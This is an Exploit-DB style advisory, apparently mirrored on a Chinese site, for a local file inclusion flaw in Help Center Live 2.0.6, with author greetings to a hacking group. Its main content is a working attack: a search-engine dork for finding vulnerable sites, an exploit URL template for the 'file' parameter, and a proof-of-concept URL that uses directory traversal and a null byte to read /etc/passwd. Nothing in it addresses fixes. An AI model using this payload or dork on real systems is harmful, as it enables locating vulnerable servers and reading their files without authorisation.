Help Center Live 2.0.6 – ‘module=helpcenter&file=’ Local File Inclusion

  • 作者: 41.w4r10r
    日期: 2010-04-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12421/
  • # Exploit Title: Help Center Live 2.0.6(module=helpcenter&file=) Local File
    Inclusion
    # Date: 27-4-2010
    # Author: 41.w4r10r
    # Software Link :
    # Version: Web Application
    # Tested on: Apcahe/Unix
    # CVE : [if exists]
    # Dork : inurl:"module=helpcenter"
    # Code :
    ---------------------------------------------------------------------------------------
    ############################################################################
    #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
    Warriors]
    #Thanks:
    SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum
    #Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
    #Catch us at www.andhrahackers.com or www.teamicw.in
    ############################################################################
    
    
    
    [+] Exploit
    
    http://example.com/[path]/module.php?module=helpcenter&file=[LFI]
    
    
    
    [+] POC :
    
    http://localhost/hcl/module.php?module=helpcenter&file=../../../../../../../../etc/passwd%00
    
    
    
    #41.w4r10r mailto:41.w4r10r@andhrahackers.com